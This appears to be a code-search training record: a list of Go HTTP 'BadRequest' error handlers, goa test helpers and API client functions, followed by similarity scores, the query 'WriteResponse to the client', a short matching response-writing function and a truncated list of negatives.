BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func (ctx *CreateSecretsContext) BadRequest() error {\n\tctx.ResponseData.WriteHeader(400)\n\treturn nil\n}", "func NewBadRequest(err error, msg ...string) *Errs {\n\tif err == nil {\n\t\terr = ErrBadRequest\n\t}\n\n\treturn &Errs{\n\t\tcodeHTTP: http.StatusBadRequest,\n\t\terr: err,\n\t\tkind: trace(2),\n\t\tmessage: msg,\n\t}\n}", "func (ctx *CreateVerificationContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func DeleteCompanyBranchHyCompanybranchBadRequest(t goatest.TInterface, ctx context.Context, service *goa.Service, ctrl app.HyCompanybranchController, id int) (http.ResponseWriter, error) {\n\t// Setup service\n\tvar (\n\t\tlogBuf bytes.Buffer\n\t\tresp interface{}\n\n\t\trespSetter goatest.ResponseSetterFunc = func(r interface{}) { resp = r }\n\t)\n\tif service == nil {\n\t\tservice = goatest.Service(&logBuf, respSetter)\n\t} else {\n\t\tlogger := log.New(&logBuf, \"\", log.Ltime)\n\t\tservice.WithLogger(goa.NewLogger(logger))\n\t\tnewEncoder := func(io.Writer) goa.Encoder { return respSetter }\n\t\tservice.Encoder = goa.NewHTTPEncoder() // Make sure the code ends up using this decoder\n\t\tservice.Encoder.Register(newEncoder, \"*/*\")\n\t}\n\n\t// Setup request context\n\trw := httptest.NewRecorder()\n\tu := &url.URL{\n\t\tPath: fmt.Sprintf(\"/api/company/branch/%v\", id),\n\t}\n\treq, err := http.NewRequest(\"DELETE\", u.String(), nil)\n\tif err != nil {\n\t\tpanic(\"invalid test \" + err.Error()) // bug\n\t}\n\tprms := url.Values{}\n\tprms[\"ID\"] = []string{fmt.Sprintf(\"%v\", id)}\n\tif ctx == nil {\n\t\tctx = context.Background()\n\t}\n\tgoaCtx := goa.NewContext(goa.WithAction(ctx, \"HyCompanybranchTest\"), rw, req, prms)\n\tdeleteCompanyBranchCtx, _err := app.NewDeleteCompanyBranchHyCompanybranchContext(goaCtx, req, service)\n\tif _err != nil {\n\t\te, ok := _err.(goa.ServiceError)\n\t\tif !ok {\n\t\t\tpanic(\"invalid test data \" + _err.Error()) // bug\n\t\t}\n\t\treturn nil, e\n\t}\n\n\t// Perform action\n\t_err = ctrl.DeleteCompanyBranch(deleteCompanyBranchCtx)\n\n\t// Validate response\n\tif _err != nil {\n\t\tt.Fatalf(\"controller returned %+v, logs:\\n%s\", _err, logBuf.String())\n\t}\n\tif rw.Code != 400 {\n\t\tt.Errorf(\"invalid response status code: got %+v, expected 400\", rw.Code)\n\t}\n\tvar mt error\n\tif resp != nil {\n\t\tvar _ok bool\n\t\tmt, _ok = resp.(error)\n\t\tif !_ok {\n\t\t\tt.Fatalf(\"invalid response media: got variable of type %T, value %+v, expected instance of error\", resp, resp)\n\t\t}\n\t}\n\n\t// Return results\n\treturn rw, mt\n}", "func TestEmployeeManagerMapCreate_BadRequest(t *testing.T) {\n\tdb, _, err := sqlmock.New()\n\tif err != nil {\n\t\tt.Fatalf(\"an error '%s' was not expected when opening a stub database connection\", err)\n\t}\n\tdefer db.Close()\n\n\templyManagerMap := NewEmployeeManagerMapHandler(db)\n\n\tw := httptest.NewRecorder()\n\tvar jsonStr = []byte(`{\"invalidjson\":}`)\n\tr := httptest.NewRequest(\"POST\", \"http://localhost:9090/api/v1/emplymgrmap\", bytes.NewBuffer(jsonStr))\n\tr = r.WithContext(context.Background())\n\templyManagerMap.Create(w, r)\n\n\texpectedResponse := `{\"error_message\":\"Error:: Invalid Request\"}`\n\tassert.Equal(t, gohttp.StatusBadRequest, w.Code)\n\tassert.Equal(t, expectedResponse, w.Body.String())\n}", "func (ctx *RegisterAuthenticationContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func NewCreateConsistencyGroupBadRequest() *CreateConsistencyGroupBadRequest {\n\treturn &CreateConsistencyGroupBadRequest{}\n}", "func (ctx *UpdateFeedContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func (e ErrUnsupportedAllocation) BadRequest() {}", "func (ctx *UpdateFilterContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func (o *ClientPermissionCreateBadRequestBody) UnmarshalJSON(raw []byte) error {\n\t// ClientPermissionCreateBadRequestBodyAO0\n\tvar clientPermissionCreateBadRequestBodyAO0 models.Error400Data\n\tif err := swag.ReadJSON(raw, &clientPermissionCreateBadRequestBodyAO0); err != nil {\n\t\treturn err\n\t}\n\to.Error400Data = clientPermissionCreateBadRequestBodyAO0\n\n\t// ClientPermissionCreateBadRequestBodyAO1\n\tvar clientPermissionCreateBadRequestBodyAO1 ClientPermissionCreateBadRequestBodyAllOf1\n\tif err := swag.ReadJSON(raw, &clientPermissionCreateBadRequestBodyAO1); err != nil {\n\t\treturn err\n\t}\n\to.ClientPermissionCreateBadRequestBodyAllOf1 = clientPermissionCreateBadRequestBodyAO1\n\n\t// ClientPermissionCreateBadRequestBodyAO2\n\tvar dataClientPermissionCreateBadRequestBodyAO2 struct {\n\t\tErrors *ClientPermissionCreateBadRequestBodyAO2Errors `json:\"errors,omitempty\"`\n\t}\n\tif err := swag.ReadJSON(raw, &dataClientPermissionCreateBadRequestBodyAO2); err != nil {\n\t\treturn err\n\t}\n\n\to.Errors = dataClientPermissionCreateBadRequestBodyAO2.Errors\n\n\treturn nil\n}", "func (ctx *ListMessageContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func (ctx *StopFeedContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func (ctx *GetFilterContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func (ctx *GetOutputContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func TestCreateValidationFail3(t *testing.T) {\n\tisTesting = true\n\tvar request = Request{\n\t\tPath: \"/api/devices\",\n\t\tHTTPMethod: \"POST\",\n\t\tBody: `{\n\t\t\t\"id\": \"valid-id\",\n\t\t\t\"deviceModel\": \"valid-device-model\",\n\t\t\t\"model\": \"valid-model\"\n\t\t}`,\n\t}\n\tvar response, _ = Handler(request)\n\tif response.StatusCode != 400 {\n\t\tt.Errorf(\"response status code has to be 400\")\n\t}\n\tif response.Body != `{\"message\":\"device should have valid name\"}` {\n\t\tt.Errorf(\"body is: %s\", response.Body)\n\t}\n}", "func (ctx *GetFeedContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func (ctx *DeleteDogContext) BadRequest() error {\n\tctx.ResponseData.WriteHeader(400)\n\treturn nil\n}", "func (ctx *UpdateOutputContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func ValidateDeleteBadRequestResponseBody(body *DeleteBadRequestResponseBody) (err error) {\n\tif body.Name == nil {\n\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"name\", \"body\"))\n\t}\n\tif body.ID == nil {\n\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"id\", \"body\"))\n\t}\n\tif body.Message == nil {\n\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"message\", \"body\"))\n\t}\n\tif body.Temporary == nil {\n\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"temporary\", \"body\"))\n\t}\n\tif body.Timeout == nil {\n\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"timeout\", \"body\"))\n\t}\n\tif body.Fault == nil {\n\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"fault\", \"body\"))\n\t}\n\treturn\n}", "func errorHandler(statusCode int, requestId string, errorCode string, message string) error {\n\n switch errorCode {\n case InvalidParameter, InvalidSubscription, InvalidCursor:\n return NewInvalidParameterError(statusCode, requestId, errorCode, message)\n case ResourceNotFound, NoSuchTopic, NoSuchProject, NoSuchSubscription, NoSuchShard, NoSuchConnector,\n NoSuchMeterInfo, NoSuchConsumer:\n return NewResourceNotFoundError(statusCode, requestId, errorCode, message)\n case SeekOutOfRange:\n return NewSeekOutOfRangeError(statusCode, requestId, errorCode, message)\n case ResourceAlreadyExist, ProjectAlreadyExist, TopicAlreadyExist, ConnectorAlreadyExist:\n return NewResourceExistError(statusCode, requestId, errorCode, message)\n case UnAuthorized:\n return NewAuthorizationFailedError(statusCode, requestId, errorCode, message)\n case NoPermission:\n return NewNoPermissionError(statusCode, requestId, errorCode, message)\n case OperatorDenied:\n return NewInvalidOperationError(statusCode, requestId, errorCode, message)\n case LimitExceed:\n return NewLimitExceededError(statusCode, requestId, errorCode, message)\n case SubscriptionOffline:\n return NewSubscriptionOfflineError(statusCode, requestId, errorCode, message)\n case OffsetReseted:\n return NewSubscriptionOffsetResetError(statusCode, requestId, errorCode, message)\n case OffsetSessionClosed, OffsetSessionChanged:\n return NewSubscriptionSessionInvalidError(statusCode, requestId, errorCode, message)\n case MalformedRecord:\n return NewMalformedRecordError(statusCode, requestId, errorCode, message)\n case ConsumerGroupInProcess:\n return NewServiceInProcessError(statusCode, requestId, errorCode, message)\n case InvalidShardOperation:\n return NewShardSealedError(statusCode, requestId, errorCode, message)\n }\n return NewDatahubClientError(statusCode, requestId, errorCode, message)\n}", "func (ctx *ListFeedContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func (o *ClientPermissionCreateBadRequestBody) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\t// validation for a type composition with models.Error400Data\n\tif err := o.Error400Data.Validate(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\t// validation for a type composition with ClientPermissionCreateBadRequestBodyAllOf1\n\n\tif err := o.validateErrors(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (a *AdminApiService) PostCategories(ctx _context.Context, localVarOptionals *PostCategoriesOpts) (Category, *_nethttp.Response, error) {\n\tvar (\n\t\tlocalVarHTTPMethod = _nethttp.MethodPost\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue Category\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/categories\"\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := _neturl.Values{}\n\tlocalVarFormParams := _neturl.Values{}\n\n\t// to determine the Content-Type header\n\tlocalVarHTTPContentTypes := []string{\"application/json\"}\n\n\t// set Content-Type header\n\tlocalVarHTTPContentType := selectHeaderContentType(localVarHTTPContentTypes)\n\tif localVarHTTPContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHTTPContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHTTPHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHTTPHeaderAccept := selectHeaderAccept(localVarHTTPHeaderAccepts)\n\tif localVarHTTPHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHTTPHeaderAccept\n\t}\n\t// body params\n\tif localVarOptionals != nil && localVarOptionals.Category.IsSet() {\n\t\tlocalVarOptionalCategory, localVarOptionalCategoryok := localVarOptionals.Category.Value().(Category)\n\t\tif !localVarOptionalCategoryok {\n\t\t\treturn localVarReturnValue, nil, reportError(\"category should be Category\")\n\t\t}\n\t\tlocalVarPostBody = &localVarOptionalCategory\n\t}\n\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHTTPMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHTTPResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHTTPResponse == nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tlocalVarBody, err := _ioutil.ReadAll(localVarHTTPResponse.Body)\n\tlocalVarHTTPResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tif localVarHTTPResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHTTPResponse.Status,\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHTTPResponse, nil\n}", "func NewAllDashboardsBadRequest() *AllDashboardsBadRequest {\n return &AllDashboardsBadRequest{\n }\n}", "func (o *CreateChannelBadRequestBody) Validate(formats strfmt.Registry) error {\n\treturn nil\n}", "func (a *APIResponse) BadRequest(err error) {\n\ta.Status = HttpStatus{Code: http.StatusBadRequest, Message: http.StatusText(http.StatusBadRequest)}\n\ta.Data = APIError{Error: err.Error()}\n}", "func (ctx *PostEventContext) BadRequest(r *AntError) error {\n\tctx.ResponseData.Header().Set(\"Content-Type\", \"vnd.ant.error+json\")\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func CreateFeedBadRequest(t goatest.TInterface, ctx context.Context, service *goa.Service, ctrl app.FeedController, tags *string, title *string, url_ string) (http.ResponseWriter, error) {\n\t// Setup service\n\tvar (\n\t\tlogBuf bytes.Buffer\n\t\tresp interface{}\n\n\t\trespSetter goatest.ResponseSetterFunc = func(r interface{}) { resp = r }\n\t)\n\tif service == nil {\n\t\tservice = goatest.Service(&logBuf, respSetter)\n\t} else {\n\t\tlogger := log.New(&logBuf, \"\", log.Ltime)\n\t\tservice.WithLogger(goa.NewLogger(logger))\n\t\tnewEncoder := func(io.Writer) goa.Encoder { return respSetter }\n\t\tservice.Encoder = goa.NewHTTPEncoder() // Make sure the code ends up using this decoder\n\t\tservice.Encoder.Register(newEncoder, \"*/*\")\n\t}\n\n\t// Setup request context\n\trw := httptest.NewRecorder()\n\tquery := url.Values{}\n\tif tags != nil {\n\t\tsliceVal := []string{*tags}\n\t\tquery[\"tags\"] = sliceVal\n\t}\n\tif title != nil {\n\t\tsliceVal := []string{*title}\n\t\tquery[\"title\"] = sliceVal\n\t}\n\t{\n\t\tsliceVal := []string{url_}\n\t\tquery[\"url\"] = sliceVal\n\t}\n\tu := &url.URL{\n\t\tPath: fmt.Sprintf(\"/v1/feeds\"),\n\t\tRawQuery: query.Encode(),\n\t}\n\treq, err := http.NewRequest(\"POST\", u.String(), nil)\n\tif err != nil {\n\t\tpanic(\"invalid test \" + err.Error()) // bug\n\t}\n\tprms := url.Values{}\n\tif tags != nil {\n\t\tsliceVal := []string{*tags}\n\t\tprms[\"tags\"] = sliceVal\n\t}\n\tif title != nil {\n\t\tsliceVal := []string{*title}\n\t\tprms[\"title\"] = sliceVal\n\t}\n\t{\n\t\tsliceVal := []string{url_}\n\t\tprms[\"url\"] = sliceVal\n\t}\n\tif ctx == nil {\n\t\tctx = context.Background()\n\t}\n\tgoaCtx := goa.NewContext(goa.WithAction(ctx, \"FeedTest\"), rw, req, prms)\n\tcreateCtx, _err := app.NewCreateFeedContext(goaCtx, req, service)\n\tif _err != nil {\n\t\te, ok := _err.(goa.ServiceError)\n\t\tif !ok {\n\t\t\tpanic(\"invalid test data \" + _err.Error()) // bug\n\t\t}\n\t\treturn nil, e\n\t}\n\n\t// Perform action\n\t_err = ctrl.Create(createCtx)\n\n\t// Validate response\n\tif _err != nil {\n\t\tt.Fatalf(\"controller returned %+v, logs:\\n%s\", _err, logBuf.String())\n\t}\n\tif rw.Code != 400 {\n\t\tt.Errorf(\"invalid response status code: got %+v, expected 400\", rw.Code)\n\t}\n\tvar mt error\n\tif resp != nil {\n\t\tvar _ok bool\n\t\tmt, _ok = resp.(error)\n\t\tif !_ok {\n\t\t\tt.Fatalf(\"invalid response media: got variable of type %T, value %+v, expected instance of error\", resp, resp)\n\t\t}\n\t}\n\n\t// Return results\n\treturn rw, mt\n}", "func BadRequest(format string, args ...interface{}) error {\n\treturn New(http.StatusBadRequest, format, args...)\n}", "func NewPostBadReq(body *PostBadReqResponseBody) *goa.ServiceError {\n\tv := &goa.ServiceError{\n\t\tName: *body.Name,\n\t\tID: *body.ID,\n\t\tMessage: *body.Message,\n\t\tTemporary: *body.Temporary,\n\t\tTimeout: *body.Timeout,\n\t\tFault: *body.Fault,\n\t}\n\n\treturn v\n}", "func NewPostBadReq(body *PostBadReqResponseBody) *goa.ServiceError {\n\tv := &goa.ServiceError{\n\t\tName: *body.Name,\n\t\tID: *body.ID,\n\t\tMessage: *body.Message,\n\t\tTemporary: *body.Temporary,\n\t\tTimeout: *body.Timeout,\n\t\tFault: *body.Fault,\n\t}\n\n\treturn v\n}", "func testBatchCTXInvalidBuild(t testing.TB) {\n\tmockBatch := mockBatchCTX(t)\n\tmockBatch.GetHeader().ServiceClassCode = 3\n\terr := mockBatch.Create()\n\tif !base.Match(err, ErrServiceClass) {\n\t\tt.Errorf(\"%T: %s\", err, err)\n\t}\n}", "func TestAddEmptyCategory(t *testing.T) {\n\tts := httptest.NewServer(http.HandlerFunc(AddCategoryFunc))\n\tdefer ts.Close()\n\treq, err := http.NewRequest(\"POST\", ts.URL, nil)\n\treq.Form = make(map[string][]string, 0)\n\treq.Form.Add(\"category\", \"\")\n\t// req.Form, _ = url.ParseQuery(\"category=\")\n\tif err != nil {\n\t\tt.Errorf(\"Error occured while constracting request:%s\", err)\n\t}\n\tw := httptest.NewRecorder()\n\tAddCategoryFunc(w, req)\n\tbody := w.Body.String()\n\tif len(body) != 0 {\n\t\tt.Error(\"Body should be empty. Instead contained data: \", body)\n\t}\n}", "func (ctx *LoginAuthenticationContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func BadRequest(w http.ResponseWriter, r *http.Request, h *render.Renderer) {\n\taccept := strings.Split(r.Header.Get(\"Accept\"), \",\")\n\taccept = append(accept, strings.Split(r.Header.Get(\"Content-Type\"), \",\")...)\n\n\tswitch {\n\tcase prefixInList(accept, ContentTypeHTML):\n\t\th.RenderHTMLStatus(w, http.StatusBadRequest, \"400\", nil)\n\tcase prefixInList(accept, ContentTypeJSON):\n\t\th.RenderJSON(w, http.StatusBadRequest, apiErrorBadRequest)\n\tdefault:\n\t\thttp.Error(w, http.StatusText(http.StatusBadRequest), http.StatusBadRequest)\n\t}\n}", "func (ctx *PutEventContext) BadRequest(r *AntError) error {\n\tctx.ResponseData.Header().Set(\"Content-Type\", \"vnd.ant.error+json\")\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func (m *ClassesItemAssignmentSettingsGradingCategoriesRequestBuilder) Post(ctx context.Context, body ie233ee762e29b4ba6970aa2a2efce4b7fde11697ca9ea81099d0f8269309c1be.EducationGradingCategoryable, requestConfiguration *ClassesItemAssignmentSettingsGradingCategoriesRequestBuilderPostRequestConfiguration)(ie233ee762e29b4ba6970aa2a2efce4b7fde11697ca9ea81099d0f8269309c1be.EducationGradingCategoryable, error) {\n requestInfo, err := m.ToPostRequestInformation(ctx, body, requestConfiguration);\n if err != nil {\n return nil, err\n }\n errorMapping := i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.ErrorMappings {\n \"4XX\": i20a3050780ee0b0cde0a884a4f35429a20d60067e3bcda382ec5400079147459.CreateODataErrorFromDiscriminatorValue,\n \"5XX\": i20a3050780ee0b0cde0a884a4f35429a20d60067e3bcda382ec5400079147459.CreateODataErrorFromDiscriminatorValue,\n }\n res, err := m.BaseRequestBuilder.RequestAdapter.Send(ctx, requestInfo, ie233ee762e29b4ba6970aa2a2efce4b7fde11697ca9ea81099d0f8269309c1be.CreateEducationGradingCategoryFromDiscriminatorValue, errorMapping)\n if err != nil {\n return nil, err\n }\n if res == nil {\n return nil, nil\n }\n return res.(ie233ee762e29b4ba6970aa2a2efce4b7fde11697ca9ea81099d0f8269309c1be.EducationGradingCategoryable), nil\n}", "func NewDeleteBadRequest(body *DeleteBadRequestResponseBody) *goa.ServiceError {\n\tv := &goa.ServiceError{\n\t\tName: *body.Name,\n\t\tID: *body.ID,\n\t\tMessage: *body.Message,\n\t\tTemporary: *body.Temporary,\n\t\tTimeout: *body.Timeout,\n\t\tFault: *body.Fault,\n\t}\n\n\treturn v\n}", "func (m *LabelsCategoriesItemSubCategoriesSubCategoryTemplateItemRequestBuilder) Patch(ctx context.Context, body i084fa7ab3bba802bf5cc3b408e230cc64c167a57976e0d42c37e17154afd5b78.SubCategoryTemplateable, requestConfiguration *LabelsCategoriesItemSubCategoriesSubCategoryTemplateItemRequestBuilderPatchRequestConfiguration)(i084fa7ab3bba802bf5cc3b408e230cc64c167a57976e0d42c37e17154afd5b78.SubCategoryTemplateable, error) {\n requestInfo, err := m.ToPatchRequestInformation(ctx, body, requestConfiguration);\n if err != nil {\n return nil, err\n }\n errorMapping := i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.ErrorMappings {\n \"4XX\": i20a3050780ee0b0cde0a884a4f35429a20d60067e3bcda382ec5400079147459.CreateODataErrorFromDiscriminatorValue,\n \"5XX\": i20a3050780ee0b0cde0a884a4f35429a20d60067e3bcda382ec5400079147459.CreateODataErrorFromDiscriminatorValue,\n }\n res, err := m.BaseRequestBuilder.RequestAdapter.Send(ctx, requestInfo, i084fa7ab3bba802bf5cc3b408e230cc64c167a57976e0d42c37e17154afd5b78.CreateSubCategoryTemplateFromDiscriminatorValue, errorMapping)\n if err != nil {\n return nil, err\n }\n if res == nil {\n return nil, nil\n }\n return res.(i084fa7ab3bba802bf5cc3b408e230cc64c167a57976e0d42c37e17154afd5b78.SubCategoryTemplateable), nil\n}", "func testBatchXCKInvalidBuild(t testing.TB) {\n\tmockBatch := mockBatchXCK(t)\n\tmockBatch.GetHeader().ServiceClassCode = 3\n\terr := mockBatch.Create()\n\tif !base.Match(err, ErrServiceClass) {\n\t\tt.Errorf(\"%T: %s\", err, err)\n\t}\n}", "func NewNewThreadBadRequest() *NewThreadBadRequest {\n\treturn &NewThreadBadRequest{}\n}", "func (ctx *GetOpmlContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func PostCoursesCourseSegmentsSegmentCategories(w http.ResponseWriter, r *http.Request) {\n\n\tvar response string\n\tuser := r.Header.Get(\"X-User\")\n\tresF := database.GetFacultyUser(user)\n\tif resF.ID == 0 {\n\t\tresponse = \"Access denied.\"\n\t\tw.WriteHeader(http.StatusBadRequest)\n\t} else {\n\t\tresJsonString, resJsonCode := database.CheckJSONContent(w, r)\n\t\tif resJsonCode != http.StatusOK {\n\t\t\tw.WriteHeader(resJsonCode)\n\t\t\tresponse = resJsonString\n\t\t} else {\n\t\t\tdec := json.NewDecoder(r.Body)\n\t\t\tdec.DisallowUnknownFields()\n\t\t\tvar newCategory database.SegmentCategory\n\t\t\terr := dec.Decode(&newCategory)\n\t\t\tif err != nil {\n\t\t\t\tlog.Println(err)\n\t\t\t}\n\t\t\tvars := mux.Vars(r)\n\t\t\tsegmentCode := vars[\"segment\"]\n\t\t\tnewCategory.SegmentID = scripts.StringToUint(segmentCode)\n\t\t\tresCode, resString := database.ValidateNewCategory(newCategory)\n\t\t\tif resCode != http.StatusOK {\n\t\t\t\tw.WriteHeader(resCode)\n\t\t\t\tresponse = resString\n\t\t\t} else {\n\t\t\t\tresult := database.CreateCategory(newCategory, database.CategoriesTableToEdit)\n\t\t\t\tif result {\n\t\t\t\t\tw.Header().Set(\"Content-Type\", \"application/json; charset=UTF-8\")\n\t\t\t\t\tw.WriteHeader(http.StatusCreated)\n\t\t\t\t\tresponse = response + \" Category created for Segment\"\n\t\t\t\t} else {\n\t\t\t\t\tw.Header().Set(\"Content-Type\", \"application/json; charset=UTF-8\")\n\t\t\t\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\t\t\t\tresponse = response + \" Could not create Category for Segment\"\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\tfmt.Fprintf(w, \"%s\", response)\n}", "func BadRequest(message ...interface{}) Err {\n\treturn Boomify(http.StatusBadRequest, message...)\n}" ]
[ "0.5717193", "0.56688726", "0.54354084", "0.5418711", "0.5237581", "0.5216485", "0.518136", "0.5173002", "0.51577747", "0.5135354", "0.5087039", "0.50678825", "0.50366735", "0.50136673", "0.50069875", "0.4961325", "0.49262026", "0.49182692", "0.49142945", "0.4903018", "0.48845655", "0.4881147", "0.48639864", "0.48605633", "0.48239037", "0.48097706", "0.48063514", "0.48047778", "0.480385", "0.4773035", "0.47689357", "0.47680536", "0.4758837", "0.47419035", "0.47351515", "0.47347453", "0.47249076", "0.47235143", "0.46981362", "0.46934524", "0.46922293", "0.46888998", "0.4680645", "0.46750766", "0.4672155", "0.46658406", "0.4661399", "0.46610194", "0.46520415", "0.4651079", "0.46460924", "0.46339795", "0.46304744", "0.46086583", "0.46060264", "0.4587578", "0.45824072", "0.4578303", "0.45755452", "0.45669806", "0.45616972", "0.4558934", "0.45560738", "0.45500097", "0.4545008", "0.45409608", "0.45352817", "0.4527152", "0.4526495", "0.45195255", "0.45169327", "0.45152816", "0.4514357", "0.45141968", "0.45122483", "0.45042613", "0.44966644", "0.44949713", "0.4492028", "0.44770566", "0.4474768", "0.4467794", "0.4461412", "0.44528276", "0.4450877", "0.44352615", "0.44352615", "0.44286588", "0.44251928", "0.442456", "0.44224963", "0.44222507", "0.44166887", "0.4414991", "0.44130918", "0.44097838", "0.4401573", "0.44014677", "0.44002444", "0.4398987" ]
0.69636065
0
WriteResponse to the client
func (o *CreateSubCategoryBadRequest) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) { rw.WriteHeader(400) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (r *Response) Write(w io.Writer) error", "func (c *Operation) writeResponse(rw http.ResponseWriter, status int, data []byte) { // nolint: unparam\n\trw.WriteHeader(status)\n\n\tif _, err := rw.Write(data); err != nil {\n\t\tlogger.Errorf(\"Unable to send error message, %s\", err)\n\t}\n}", "func WriteResponse(w http.ResponseWriter, mensaje string, code int) {\n\tmessage := myTypes.Respuesta{\n\t\tMessage: mensaje,\n\t}\n\tresponse, _ := json.Marshal(message)\n\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(code)\n\tw.Write(response)\n}", "func WriteResponse(w http.ResponseWriter, object interface{}, rerr *irma.RemoteError) {\n\tstatus, bts := JsonResponse(object, rerr)\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(status)\n\t_, err := w.Write(bts)\n\tif err != nil {\n\t\tLogWarning(errors.WrapPrefix(err, \"failed to write response\", 0))\n\t}\n}", "func (o *PingOK) WriteResponse(rw 